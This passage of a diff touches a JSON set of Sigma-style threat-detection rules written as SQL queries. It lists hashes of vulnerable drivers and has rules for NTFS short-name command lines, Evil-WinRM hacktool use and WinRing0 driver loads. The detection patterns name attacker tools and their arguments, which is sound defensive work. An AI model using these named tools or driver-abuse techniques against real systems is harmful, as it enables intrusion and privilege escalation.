'7ba19a701c8af76988006d616a5f77484c13cb0a', '4243dbbf6e5719d723f24d0f862afd0fcb40bc35', '00b4e8b7644d1bf93f5ddb5740b444b445e81b02', 'fd833f3fe2fa396878033b9e6054725248bf9881', 'db446af0e34259e95f4db112a9f06177e1eef4e0', '39d7b121bc654a0de891225e0f8b7b5537c24931', 'd0a228ed8af190dec0c1a812e212f5e68ee3b43e', '7d2fc1a6729521e5c76f659e4c398e2061f7ed5e', 'f999709e5b00a68a0f4fa912619fe6548ad0c42d', '06232f7ea7ea24102d452427aedbbc8b8e188a0c', 'a380aeb3ffaecc53ca48bb1d4d622c46f1de7962', '4927d843577bada119a17b249ff4e7f5e9983a92', 'e5114fd50904c7fb75d8c86367b9a2dd4f79dfb1', '3ccf1f3ac636a5e21b39ede48ff49fa23e05413f', '755349d56cdd668ca22eebc4fc89f0cccef47327', '56af49e030eb85528e82849d7d1b6147f3c4973e', '45a9f95a7a018925148152b888d09d478d56bbf5', 
'540b9f9a232b9d597138b8e0f33d83f5f6e247af', 'bdfb25cc4ed569dc0d5849545eb4abe08539029f', '28da2ac7c82b999c53f99d55331cfa3624a0bc6f', '5d5f92fba0f39826b527f335a7cca7d363758410', '1858ab7ad1947f5c24b9c913cd975e6dbb536865', '0f2aa3bfdfd699e258382ea1b3c1db1ad7211023', '886a9c16b871da42cdb54c6738a8e088be8b989f', 'c24883645c0589f6171e8ee10080750ac66d75e6', '36d3b09e19477d807a6a5efff89aa6cc8b71bdeb', 'e58dd758e28218e1edb33cd88bb97504972ee221', 'd782ef79266179d2247807857877fabb2e402be5') OR sha256 IN ('04A85E359525D662338CAE86C1E59B1D7AA9BD12B920E8067503723DC1E03162', '05F052C64D192CF69A462A5EC16DDA0D43CA5D0245900C9FCB9201685A2E7748', '4045AE77859B1DBF13972451972EAAF6F3C97BEA423E9E78F1C2F14330CD47CA', '6948480954137987A0BE626C24CF594390960242CD75F094CD6AAA5C2E7A54FA', '8CB62C5D41148DE416014F80BD1FD033FD4D2BD504CB05B90EEB6992A382D58F', 'B1D96233235A62DBB21B8DBE2D1AE333199669F67664B107BFF1AD49B41D9414', '7196187FB1EF8D108B380D37B2AF8EFDEB3CA1F6EEFD37B5DC114C609147216D', '7F375639A0DF7FE51E5518CF87C3F513C55BC117DB47D28DA8C615642EB18BFA', '42579A759F3F95F20A2C51D5AC2047A2662A2675B3FB9F46C1ED7F23393A0F00', '2DA330A2088409EFC351118445A824F11EDBE51CF3D653B298053785097FE40E', '436CCAB6F62FA2D29827916E054ADE7ACAE485B3DE1D3E5C6C62D3DEBF1480E7', 'B4D47EA790920A4531E3DF5A4B4B0721B7FEA6B49A35679F0652F1E590422602', 'DDE6F28B3F7F2ABBEE59D4864435108791631E9CB4CDFB1F178E5AA9859956D8', 'B48A309EE0960DA3CAAAAF1E794E8C409993AEB3A2B64809F36B97AAC8A1E62A', '025E7BE9FCEFD6A83F4471BBA0C11F1C11BD5047047D26626DA24EE9A419CDC4', '2AA1B08F47FBB1E2BD2E4A492F5D616968E703E1359A921F62B38B8E4662F0C4', 'ECE0A900EA089E730741499614C0917432246CEB5E11599EE3A1BB679E24FD2C', 'F40435488389B4FB3B945CA21A8325A51E1B5F80F045AB019748D0EC66056A8B', '2A652DE6B680D5AD92376AD323021850DAB2C653ABF06EDF26120F7714B8E08A', '950A4C0C772021CEE26011A92194F0E58D61588F77F2873AA0599DFF52A160C9', '0AAFA9F47ACF69D46C9542985994FF5321F00842A28DF2396D4A3076776A83CB', '47F08F7D30D824A8F4BB8A98916401A37C0FD8502DB308ABA91FE3112B892DCC', 
'B9A4E40A5D80FEDD1037EAED958F9F9EFED41EB01ADA73D51B5DCD86E27E0CBF', '5C04C274A708C9A7D993E33BE3EA9E6119DC29527A767410DBAF93996F87369A', '0040153302B88BEE27EB4F1ECA6855039E1A057370F5E8C615724FA5215BADA3', '3326E2D32BBABD69FEB6024809AFC56C7E39241EBE70A53728C77E80995422A5', '36B9E31240AB0341873C7092B63E2E0F2CAB2962EBF9B25271C3A1216B7669EB', '29E0062A017A93B2F2F5207A608A96DF4D554C5DE976BD0276C2590A03BD3E94', '45ABDBCD4C0916B7D9FAAF1CD08543A3A5178871074628E0126A6EDA890D26E0', '50DB5480D0392A7DD6AB5DF98389DC24D1ED1E9C98C9C35964B19DABCD6DC67F', '607DC4C75AC7AEF82AE0616A453866B3B358C6CF5C8F9D29E4D37F844306B97C', '61D6E40601FA368800980801A662A5B3B36E3C23296E8AE1C85726A56EF18CC8', '74A846C61ADC53692D3040AFF4C1916F32987AD72B07FE226E9E7DBEFF1036C4', '76FB4DEAEE57EF30E56C382C92ABFFE2CF616D08DBECB3368C8EE6B02E59F303', '81939E5C12BD627FF268E9887D6FB57E95E6049F28921F3437898757E7F21469', '9790A7B9D624B2B18768BB655DDA4A05A9929633CEF0B1521E79E40D7DE0A05B', '9A1D66036B0868BBB1B2823209FEDEA61A301D5DD245F8E7D390BD31E52D663E', 'AA9AB1195DC866270E984F1BED5E1358D6EF24C515DFDB6C2A92D1E1B94BF608', 'AF095DE15A16255CA1B2C27DAD365DFF9AC32D2A75E8E288F5A1307680781685', 'D5586DC1E61796A9AE5E5D1CED397874753056C3DF2EB963A8916287E1929A71', 'D8459F7D707C635E2C04D6D6D47B63F73BA3F6629702C7A6E0DF0462F6478AE2', 'E81230217988F3E7EC6F89A06D231EC66039BDBA340FD8EBB2BBB586506E3293', 'F88EBB633406A086D9CCA6BC8B66A4EA940C5476529F9033A9E0463512A23A57', '1C8DFA14888BB58848B4792FB1D8A921976A9463BE8334CFF45CC96F1276049A', '22418016E980E0A4A2D01CA210A17059916A4208352C1018B0079CCB19AAF86A', '405472A8F9400A54BB29D03B436CCD58CFD6442FE686F6D2ED4F63F002854659', '49F75746EEBE14E5DB11706B3E58ACCC62D4034D2F1C05C681ECEF5D1AD933BA', '4A3D4DB86F580B1680D6454BAEE1C1A139E2DDE7D55E972BA7C92EC3F555DCE2', '4AB41816ABBF14D59E75B7FAD49E2CB1C1FEB27A3CB27402297A2A4793FF9DA7', '54841D9F89E195196E65AA881834804FE3678F1CF6B328CAB8703EDD15E3EC57', '5EE292B605CD3751A24E5949AAE615D472A3C72688632C3040DC311055B75A92', 
'76B86543CE05540048F954FED37BDDA66360C4A3DDB8328213D5AEF7A960C184', '7F190F6E5AB0EDAFD63391506C2360230AF4C2D56C45FC8996A168A1FC12D457', '845F1E228DE249FC1DDF8DC28C39D03E8AD328A6277B6502D3932E83B879A65A', '84BF1D0BCDF175CFE8AEA2973E0373015793D43907410AE97E2071B2C4B8E2D4', '8EF0AD86500094E8FA3D9E7D53163AA6FEEF67C09575C169873C494ED66F057F', 'A56C2A2425EB3A4260CC7FC5C8D7BED7A3B4CD2AF256185F24471C668853AEE8', 'AC3F613D457FC4D44FA27B2E0B1BAA62C09415705EFB5A40A4756DA39B3AC165', 'B1334A71CC73B3D0C54F62D8011BEC330DFC355A239BF94A121F6E4C86A30A2E', 'B47BE212352D407D0EF7458A7161C66B47C2AEC8391DD101DF11E65728337A6A', 'B9B3878DDC5DFB237D38F8D25067267870AFD67D12A330397A8853209C4D889C', 'DB90E554AD249C2BD888282ECF7D8DA4D1538DD364129A3327B54F8242DD5653', 'E61A54F6D3869B43C4ECEAC3016DF73DF67CCE03878C5A6167166601C5D3F028', '3871E16758A1778907667F78589359734F7F62F9DC953EC558946DCDBE6951E3', '80CBBA9F404DF3E642F22C476664D63D7C229D45D34F5CD0E19C65EB41BECEC3', 'BB50818A07B0EB1BD317467139B7EB4BAD6CD89053FECDABFEAE111689825955', 'FF6729518A380BF57F1BC6F1EC0AA7F3012E1618B8D9B0F31A61D299EE2B4339', '3A5EC83FE670E5E23AEF3AFA0A7241053F5B6BE5E6CA01766D6B5F9177183C25', '61A1BDDDD3C512E681818DEBB5BEE94DB701768FC25E674FCAD46592A3259BD0', '07B6D69BAFCFD767F1B63A490A8843C3BB1F8E1BBEA56176109B5743C8F7D357', '21CCDD306B5183C00ECFD0475B3152E7D94B921E858E59B68A03E925D1715F21', '2D83CCB1AD9839C9F5B3F10B1F856177DF1594C66CBBC7661677D4B462EBF44D', 'F581DECC2888EF27EE1EA85EA23BBB5FB2FE6A554266FF5A1476ACD1D29D53AF', 'F8965FDCE668692C3785AFA3559159F9A18287BC0D53ABB21902895A8ECF221B', '3D23BDBAF9905259D858DF5BF991EB23D2DC9F4ECDA7F9F77839691ACEF1B8C4', 'DD4A1253D47DE14EF83F1BC8B40816A86CCF90D1E624C5ADF9203AE9D51D4097', '509628B6D16D2428031311D7BD2ADD8D5F5160E9ECC0CD909F1E82BBBB3234D6', '525D9B51A80CA0CD4C5889A96F857E73F3A80DA1FFBAE59851E0F51BDFB0B6CD', '6DE84CAA2CA18673E01B91AF58220C60AECD5CCCF269725EC3C7F226B2167492', '09BEDBF7A41E0F8DABE4F41D331DB58373CE15B2E9204540873A1884F38BDDE1', 
'101402D4F5D1AE413DED499C78A5FCBBC7E3BAE9B000D64C1DD64E3C48C37558', '131D5490CEB9A5B2324D8E927FEA5BECFC633015661DE2F4C2F2375A3A3B64C6', '1DDFE4756F5DB9FB319D6C6DA9C41C588A729D9E7817190B027B38E9C076D219', '1E8B0C1966E566A523D652E00F7727D8B0663F1DFDCE3B9A09B9ADFAEF48D8EE', '2BBE65CBEC3BB069E92233924F7EE1F95FFA16173FCEB932C34F68D862781250', '30706F110725199E338E9CC1C940D9A644D19A14F0EB8847712CBA4CACDA67AB', '3124B0411B8077605DB2A9B7909D8240E0D554496600E2706E531C93C931E1B5', '38FA0C663C8689048726666F1C5E019FEAA9DA8278F1DF6FF62DA33961891D2A', '39CFDE7D401EFCE4F550E0A9461F5FC4D71FA07235E1336E4F0B4882BD76550E', '3D9E83B189FCF5C3541C62D1F54A0DA0A4E5B62C3243D2989AFC46644056C8E3', '3F2FDA9A7A9C57B7138687BBCE49A2E156D6095DDDABB3454EA09737E02C3FA5', '47F0CDAA2359A63AD1389EF4A635F1F6EEE1F63BDF6EF177F114BDCDADC2E005', '50D5EAA168C077CE5B7F15B3F2C43BD2B86B07B1E926C1B332F8CB13BD2E0793', '56A3C9AC137D862A85B4004F043D46542A1B61C6ACB438098A9640469E2D80E7', '591BD5E92DFA0117B3DAA29750E73E2DB25BAA717C31217539D30FFB1F7F3A52', '5D530E111400785D183057113D70623E17AF32931668AB7C7FC826F0FD4F91A3', '6F1FF29E2E710F6D064DC74E8E011331D807C32CC2A622CBE507FD4B4D43F8F4', '79E2D37632C417138970B4FEBA91B7E10C2EA251C5EFE3D1FC6FA0190F176B57', '85866E8C25D82C1EC91D7A8076C7D073CCCF421CF57D9C83D80D63943A4EDD94', '89B0017BC30CC026E32B758C66A1AF88BD54C6A78E11EC2908FF854E00AC46BE', '9254F012009D55F555418FF85F7D93B184AB7CB0E37AECDFDAB62CFE94DEA96B', '984A77E5424C6D099051441005F2938AE92B31B5AD8F6521C6B001932862ADD7', '98B734DDA78C16EBCAA4AFEB31007926542B63B2F163B2F733FA0D00DBB344D8', '99F4994A0E5BD1BF6E3F637D3225C69FF4CD620557E23637533E7F18D7D6CBA1', '9C10E2EC4F9EF591415F9A784B93DC9C9CDAFA7C69602C0DC860C5B62222E449', 'A961F5939088238D76757669A9A81905E33F247C9C635B908DAAC146AE063499', 'A9706E320179993DADE519A83061477ACE195DAA1B788662825484813001F526', 'B7A20B5F15E1871B392782C46EBCC897929443D82073EE4DCB3874B6A5976B5D', 'CC586254E9E89E88334ADEE44E332166119307E79C2F18F6C2AB90CE8BA7FC9B', 
'CD4A249C3EF65AF285D0F8F30A8A96E83688486AAB515836318A2559757A89BB', 'CF4B5FA853CE809F1924DF3A3AE3C4E191878C4EA5248D8785DC7E51807A512B', 'D0BD1AE72AEB5F3EABF1531A635F990E5EAAE7FDD560342F915F723766C80889', 'D8B58F6A89A7618558E37AFC360CD772B6731E3BA367F8D58734ECEE2244A530', 'D92EAB70BCECE4432258C9C9A914483A2267F6AB5CE2630048D3A99E8CB1B482', 'E005E8D183E853A27AD3BB56F25489F369C11B0D47E3D4095AAD9291B3343BF1', 'E68D453D333854787F8470C8BAEF3E0D082F26DF5AA19C0493898BCF3401E39A', 'E83908EBA2501A00EF9E74E7D1C8B4FF1279F1CD6051707FD51824F87E4378FA', 'EF86C4E5EE1DBC4F81CD864E8CD2F4A2A85EE4475B9A9AB698A4AE1CC71FBEB0', 'F088B2BA27DACD5C28F8EE428F1350DCA4BC7C6606309C287C801B2E1DA1A53D', 'FD8669794C67B396C12FC5F08E9C004FDF851A82FAF302846878173E4FBECB03', '91314768DA140999E682D2A290D48B78BB25A35525EA12C1B1F9634D14602B2C', 'F0605DDA1DEF240DC7E14EFA73927D6C6D89988C01EA8647B671667B2B167008', '6CB51AE871FBD5D07C5AAD6FF8EEA43D34063089528603CA9CEB8B4F52F68DDC', 'DB2A9247177E8CDD50FE9433D066B86FFD2A84301AA6B2EB60F361CFFF077004', '7EC93F34EB323823EB199FBF8D06219086D517D0E8F4B9E348D7AFD41EC9FD5D', '7049F3C939EFE76A5556C2A2C04386DB51DAF61D56B679F4868BB0983C996EBB', '7877C1B0E7429453B750218CA491C2825DAE684AD9616642EFF7B41715C70ACA', '159E7C5A12157AF92E0D14A0D3EA116F91C09E21A9831486E6DC592C93C10980', '3243AAB18E273A9B9C4280A57AECEF278E10BFFF19ABB260D7A7820E41739099', '7CFA5E10DFF8A99A5D544B011F676BC383991274C693E21E3AF40CF6982ADB8C', 'C9B49B52B493B53CD49C12C3FA9553E57C5394555B64E32D1208F5B96A5B8C6E', '3EC5AD51E6879464DFBCCB9F4ED76C6325056A42548D5994BA869DA9C4C039A8', '47EAEBC920CCF99E09FC9924FEB6B19B8A28589F52783327067C9B09754B5E84', '80599708ce61ec5d6dcfc5977208a2a0be2252820a88d9ba260d8cdf5dc7fbe4', '9091e044273ff624585235ac885eb2b05dfb12f3022dcf535b178ff1b2e012d1', '01aa278b07b58dc46c84bd0b1b5c8e9ee4e62ea0bf7a695862444af32e87f1fd', 'ddbf5ecca5c8086afde1fb4f551e9e6400e94f4428fe7fb5559da5cffa654cc1', '0296e2ce999e67c76352613a718e11516fe1b0efc3ffdb8918fc999dd76a73a5', 
'ded2927f9a4e64eefd09d0caba78e94f309e3a6292841ae81d5528cab109f95d', '41cceace9751dce2b6ecaedc9a2d374fbb6458cf93b00a1dcd634ad0bc54ef89', '58a74dceb2022cd8a358b92acd1b48a5e01c524c3b0195d7033e4bd55eff4495', '11bd2c9f9e2397c9a16e0990e4ed2cf0679498fe0fd418a3dfdac60b5c160ee5', 'cf3a7d4285d65bf8688215407bce1b51d7c6b22497f09021f0fce31cbeb78986', '31f4cfb4c71da44120752721103a16512444c13c2ac2d857a7e6f13cb679b427', '22be050955347661685a4343c51f11c7811674e030386d2264cd12ecbf544b7c', '70211a3f90376bbc61f49c22a63075d1d4ddd53f0aefa976216c46e6ba39a9f4', '1aaf4c1e3cb6774857e2eef27c17e68dc1ae577112e4769665f516c2e8c4e27b', 'e6056443537d4d2314dabca1b9168f1eaaf17a14eb41f6f5741b6b82b3119790', '76660e91f1ff3cb89630df5af4fe09de6098d09baa66b1a130c89c3c5edd5b22', '6c7120e40fc850e4715058b233f5ad4527d1084a909114fd6a36b7b7573c4a44', '2e6b339597a89e875f175023ed952aaac64e9d20d457bbc07acf1586e7fe2df8', '71fe5af0f1564dc187eea8d59c0fbc897712afa07d18316d2080330ba17cf009', '39937d239220c1b779d7d55613de2c0a48bd6e12e0214da4c65992b96cf591df', '7ed26a593524a2a92ffcfb075a42bb4fa4775ffbf83af98525244a4710886ead', 'aa717e9ab4d614497df19f602d289a6eddcdba8027c71bcc807780a219347d16', 'ff5f6048a3d6f6738b60e911e3876fcbdc9a02ec9862f909345c8a50fd4cc0a7', '952199C28332BC90CFD74530A77EE237967ED32B3C71322559C59F7A42187DC4', '9529EFB1837B1005E5E8F477773752078E0A46500C748BC30C9B5084D04082E6', 'A7B000ABBCC344444A9B00CFADE7AA22AB92CE0CADEC196C30EB1851AE4FA062', '4429f32db1cc70567919d7d47b844a91cf1329a6cd116f582305f3b7b60cd60b', '01e024cb14b34b6d525c642a710bfa14497ea20fd287c39ba404b10a8b143ece', '9fc29480407e5179aa8ea41682409b4ea33f1a42026277613d6484e5419de374', '06bda5a1594f7121acd2efe38ccb617fbc078bb9a70b665a5f5efd70e3013f50', 'cbb8239a765bf5b2c1b6a5c8832d2cab8fef5deacadfb65d8ed43ef56d291ab6', 'd205286bffdf09bc033c09e95c519c1c267b40c2ee8bab703c6a2d86741ccd3e', 'a7c2e7910942dd5e43e2f4eb159bcd2b4e71366e34a68109548b9fb12ac0f7cc', '2003b478b9fd1b3d76ec5bf4172c2e8915babbbee7ad1783794acbf8d4c2519d', 
'f929bead59e9424ab90427b379dcdd63fbfe0c4fb5e1792e3a1685541cd5ec65', '59626cac380d8fe0b80a6d4c4406d62ba0683a2f0f68d50ad506ca1b1cf25347', '552f70374715e70c4ade591d65177be2539ec60f751223680dfaccb9e0be0ed9', '86a8e0aa29a5b52c84921188cc1f0eca9a7904dcfe09544602933d8377720219', '1d0397c263d51e9fc95bcc8baf98d1a853e1c0401cd0e27c7bf5da3fba1c93a8', '60c6f4f34c7319cb3f9ca682e59d92711a05a2688badbae4891b1303cd384813', '55fee54c0d0d873724864dc0b2a10b38b7f40300ee9cae4d9baaf8a202c4049a', '42f0b036687cbd7717c9efed6991c00d4e3e7b032dc965a2556c02177dfdad0f', 'bb1135b51acca8348d285dc5461d10e8f57260e7d0c8cc4a092734d53fc40cbc', 'b179e1ab6dc0b1aee783adbcad4ad6bb75a8a64cb798f30c0dd2ee8aaf43e6de', '314384b40626800b1cde6fbc51ebc7d13e91398be2688c2a58354aa08d00b073', '65db1b259e305a52042e07e111f4fa4af16542c8bacd33655f753ef642228890', '19a212e6fc324f4cb9ee5eba60f5c1fc0191799a4432265cbeaa3307c76a7fc0', 'a7c8f4faf3cbb088cac7753d81f8ec4c38ccb97cd9da817741f49272e8d01200', '677c0b1add3990fad51f492553d3533115c50a242a919437ccb145943011d2bf', 'fc22977ff721b3d718b71c42440ee2d8a144f3fbc7755e4331ddd5bcc65158d2', 'ad40e6d0f77c0e579fb87c5106bf6de3d1a9f30ee2fbf8c9c011f377fa05f173', '18e1707b319c279c7e0204074088cc39286007a1cf6cb6e269d5067d8d0628c6', 'c9cf1d627078f63a36bbde364cd0d5f2be1714124d186c06db5bcdf549a109f8', 'afdd66562dea51001c3a9de300f91fc3eb965d6848dfce92ccb9b75853e02508', 'a899b659b08fbae30b182443be8ffb6a6471c1d0497b52293061754886a937a3', '1963d5a0e512b72353953aadbe694f73a9a576f0241a988378fa40bf574eda52', '7133a461aeb03b4d69d43f3d26cd1a9e3ee01694e97a0645a3d8aa1a44c39129', '32e1a8513eee746d17eb5402fb9d8ff9507fb6e1238e7ff06f7a5c50ff3df993', '082c39fe2e3217004206535e271ebd45c11eb072efde4cc9885b25ba5c39f91d', '65329dad28e92f4bcc64de15c552b6ef424494028b18875b7dba840053bc0cdd', 'f8430bdc6fd01f42217d66d87a3ef6f66cb2700ebb39c4f25c8b851858cc4b35', '9f1229cd8dd9092c27a01f5d56e3c0d59c2bb9f0139abf042e56f343637fda33', 'b03f26009de2e8eabfcf6152f49b02a55c5e5d0f73e01d48f5a745f93ce93a29', 
'3943a796cc7c5352aa57ccf544295bfd6fb69aae147bc8235a00202dc6ed6838', '3c5bf92c26398695f9ced7ce647a7e9f6ddcc89eea66b45aa3607196a187431b', '478917514be37b32d5ccf76e4009f6f952f39f5553953544f1b0688befd95e82', '4ed2d2c1b00e87b926fb58b4ea43d2db35e5912975f4400aa7bd9f8c239d08b7', 'b205835b818d8a50903cf76936fcf8160060762725bd74a523320cfbd091c038', 'ab8f2217e59319b88080e052782e559a706fa4fb7b8b708f709ff3617124da89', '73327429c505d8c5fd690a8ec019ed4fd5a726b607cabe71509111c7bfe9fc7e', '87e38e7aeaaaa96efe1a74f59fca8371de93544b7af22862eb0e574cec49c7c3', '2270a8144dabaf159c2888519b11b61e5e13acdaa997820c09798137bded3dd6', '43ba8d96d5e8e54cab59d82d495eeca730eeb16e4743ed134cdd495c51a4fc89', 'e1980c6592e6d2d92c1a65acad8f1071b6a404097bb6fcce494f3c8ac31385cf', '1dadd707c55413a16320dc70d2ca7784b94c6658331a753b3424ae696c5d93ea', 'd84e3e250a86227c64a96f6d5ac2b447674ba93d399160850acb2339da43eae5', '5ae23f1fcf3fb735fcf1fa27f27e610d9945d668a149c7b7b0c84ffd6409d99a', '0f726d8ce21c0c9e01ebe6b55913c519ad6086bcaec1a89f8308f3effacd435f', '95d50c69cdbf10c9c9d61e64fe864ac91e6f6caa637d128eb20e1d3510e776d3', '0e14a4401011a9f4e444028ac5b1595da34bbbf9af04a00670f15ff839734003', '26c86227d3f387897c1efd77dc711eef748eb90be84149cb306e3d4c45cc71c7', '42d926cfb3794f9b1e3cb397498696cb687f505e15feb9df11b419c49c9af498', '1684e24dae20ab83ab5462aa1ff6473110ec53f52a32cfb8c1fe95a2642c6d22', '9b6a84f7c40ea51c38cc4d2e93efb3375e9d98d4894a85941190d94fbe73a4e4', '440883cd9d6a76db5e53517d0ec7fe13d5a50d2f6a7f91ecfc863bc3490e4f5c', 'e05eeb2b8c18ad2cb2d1038c043d770a0d51b96b748bc34be3e7fc6f3790ce53', '3a364a7a3f6c0f2f925a060e84fb18b16c118125165b5ea6c94363221dc1b6de', 'fda506e2aa85dc41a4cbc23d3ecc71ab34e06f1def736e58862dc449acbc2330', '3ac5e01689a3d745e60925bc7faca8d4306ae693e803b5e19c94906dc30add46', '175eed7a4c6de9c3156c7ae16ae85c554959ec350f1c8aaa6dfe8c7e99de3347', '8596ea3952d84eeef8f5dc5b0b83014feb101ec295b2d80910f21508a95aa026', '52a90fd1546c068b92add52c29fbb8a87d472a57e609146bbcb34862f9dcec15', 
'543991ca8d1c65113dff039b85ae3f9a87f503daec30f46929fd454bc57e5a91', 'e75714f8e0ff45605f6fc7689a1a89c7dcd34aab66c6131c63fefaca584539cf', '1aaa9aef39cb3c0a854ecb4ca7d3b213458f302025e0ec5bfbdef973cca9111c', 'cc687fe3741bbde1dd142eac0ef59fd1d4457daee43cdde23bb162ef28d04e64', '3ed15a390d8dfbd8a8fb99e8367e19bfd1cced0e629dfe43ccdb46c863394b59', '8c95d28270a4a314299cf50f05dcbe63033b2a555195d2ad2f678e09e00393e6', 'eea53103e7a5a55dc1df79797395a2a3e96123ebd71cdd2db4b1be80e7b3f02b', '37c637a74bf20d7630281581a8fae124200920df11ad7cd68c14c26cc12c5ec9', '32cccc4f249499061c0afa18f534c825d01034a1f6815f5506bf4c4ff55d1351', 'c5050a2017490fff7aa53c73755982b339ddb0fd7cef2cde32c81bc9834331c5', 'ff803017d1acafde6149fe7d463aee23b1c4f6f3b97c698c05f3ca6f07e4df6c', '000547560fea0dd4b477eb28bf781ea67bf83c748945ce8923f90fdd14eb7a4b', '0af5ccb3d33a9ba92071c9637be6254030d61998733a5eb3583e865e17844e05', 'a13054f349b7baa8c8a3fcbd31789807a493cc52224bbff5e412eb2bd52a6433', 'da6ca1fb539f825ca0f012ed6976baf57ef9c70143b7a1e88b4650bf7a925e24', '9c2977d63faa340b03e1bbfb8a6db19c0adfa60ff6579b888ece10022c94c3ec', '771a8d05f1af6214e0ef0886662be500ee910ab99f0154227067fddcfe08a3dd', '927c2a580d51a598177fa54c65e9d2610f5f212f1b6cb2fbf2740b64368f010a', '42851a01469ba97cdc38939b10cf9ea13237aa1f6c37b1ac84904c5a12a81fa0', 'e6db8a1c9d82d18b948c7135439fdeaa9bc02ea97509e3534de65e5481489220', '1062211314088012edb9fe65780e35e7b3144ac45021269fc993ef2931c8584b', '029dbf6d8dc920a32b3c7a2057513d3741b20b7f6e7aa23b113859a8049214df', '1d053020079124ac526d84affb17bf4a1563ecd872c83b4b6299c9aa6a732557', 'c059f1b2b73ecab48d62f469d48dbde74a80c4ada07f0bd3b417ec4e044fb522', 'a66d2fb7ef7350ea74d4290c57fb62bc59c6ea93f759d4ca93c3febca7aeb512', '5d712d3fad791bdc67502ed7c6586ca39d12ae26c7b245c36effec92e3cda08e', 'e61004335dfe7349f2b2252baa1e111fb47c0f2d6c78a060502b6fcc92f801e4', '7c0f77d103015fc29379ba75d133dc3450d557b0ba1f7495c6b43447abdae230', '97363f377aaf3c01641ac04a15714acbec978afb1219ac8f22c7e5df7f2b2d56', 
'8e6363a6393eb4234667c6f614b2072e33512866b3204f8395bbe01530d63f2f', '09b0e07af8b17db1d896b78da4dd3f55db76738ee1f4ced083a97d737334a184', '2a4f4400402cdc475d39389645ca825bb0e775c3ecb7c527e30c5be44e24af7d', '5f69d6b167a1eeca3f6ac64785c3c01976ee7303171faf998d65852056988683', 'f877296e8506e6a1acbdacdc5085b18c6842320a2775a329d286bac796f08d54', '2d2c7ee9547738a8a676ab785c151e8b48ed40fe7cf6174650814c7f5f58513b', '1ae328c88cf49072c125f41b16c2a2063203b21164245e2850ca491bdd4a522e', '84b4e202c6ce1b08cda1b5e7cd3c3b073155120d80141b2055a1a98a4a18dc42', '0ea78cb430fbf8ef4c9f3d1eadf2b057939081b1367bc6610e918fa3c6d8920c', 'a2571531c6b384003bad06003be01e75fcd489b7b2d04c3d072b10f08f50b33b', '4d07f9ecd2540218194874427155a4dc82613574672b55257a321f80e7c9f219', '6d14ae56e140c02f5d1e6df5351b87ac0f4b7e9dc5a3d778a1e399cb7878802a', 'c4310708ee81058286be30db1b1d93deab62a37eaa7974750a7ffbe798eed747', 'd3d88be19bbb889af859c6189b0750a4e527891f95b0dd2e33cb987ec9784f34', '3313e8d7f276a48fbc9cbdb5bcd013fd79a674da6638327c6342a5c5a3bfa893')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%~1.exe%' ESCAPE '\\' OR CommandLine LIKE '%~1.bat%' ESCAPE '\\' OR CommandLine LIKE '%~1.msi%' ESCAPE '\\' OR CommandLine LIKE '%~1.vbe%' ESCAPE '\\' OR CommandLine LIKE '%~1.vbs%' ESCAPE '\\' OR CommandLine LIKE '%~1.dll%' ESCAPE '\\' OR CommandLine LIKE '%~1.ps1%' ESCAPE '\\' OR CommandLine LIKE '%~1.js%' ESCAPE '\\' OR CommandLine LIKE '%~1.hta%' ESCAPE '\\' OR CommandLine LIKE '%~2.exe%' ESCAPE '\\' OR CommandLine LIKE '%~2.bat%' ESCAPE '\\' OR CommandLine LIKE '%~2.msi%' ESCAPE '\\' OR CommandLine LIKE '%~2.vbe%' ESCAPE '\\' OR CommandLine LIKE '%~2.vbs%' ESCAPE '\\' OR CommandLine LIKE '%~2.dll%' ESCAPE '\\' OR CommandLine LIKE '%~2.ps1%' ESCAPE '\\' OR CommandLine LIKE '%~2.js%' ESCAPE '\\' OR CommandLine LIKE '%~2.hta%' ESCAPE '\\') AND NOT ((ParentImage LIKE '%\\\\WebEx\\\\WebexHost.exe' ESCAPE '\\' OR ParentImage LIKE 
'%\\\\thor\\\\thor64.exe' ESCAPE '\\') OR CommandLine LIKE '%C:\\\\xampp\\\\vcredist\\\\VCREDI~1.EXE%' ESCAPE '\\'))" ], - "filename": "driver_load_win_vuln_drivers.yml" + "filename": "proc_creation_win_susp_ntfs_short_name_use_cli.yml" }, { - "title": "Vulnerable WinRing0 Driver Load", - "id": "1a42dfa6-6cb2-4df9-9b48-295be477e835", - "status": "experimental", - "description": "Detects the load of a signed WinRing0 driver often used by threat actors, crypto miners (XMRIG) or malware for privilege escalation", - "author": "Florian Roth (Nextron Systems)", + "title": "HackTool - WinRM Access Via Evil-WinRM", + "id": "a197e378-d31b-41c0-9635-cfdf1c1bb423", + "status": "test", + "description": "Adversaries may use Valid Accounts to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user.", + "author": "frack113", "tags": [ - "attack.privilege_escalation", - "attack.t1543.003" + "attack.lateral_movement", + "attack.t1021.006" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ImageLoaded LIKE '%\\\\WinRing0x64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WinRing0.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WinRing0.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WinRing0x64.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winring00x64.sys' ESCAPE '\\') OR Hashes LIKE '%IMPHASH=D41FA95D4642DC981F10DE36F4DC8CD7%' ESCAPE '\\' OR Imphash = 'd41fa95d4642dc981f10de36f4dc8cd7'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\ruby.exe' ESCAPE '\\' AND CommandLine LIKE '%-i %' ESCAPE '\\' AND CommandLine LIKE '%-u %' ESCAPE '\\' AND CommandLine LIKE '%-p %' ESCAPE '\\')" ], - "filename": "driver_load_win_vuln_winring0_driver.yml" + "filename": "proc_creation_win_hktl_evil_winrm.yml" }, { - "title": "Usage Of Malicious 
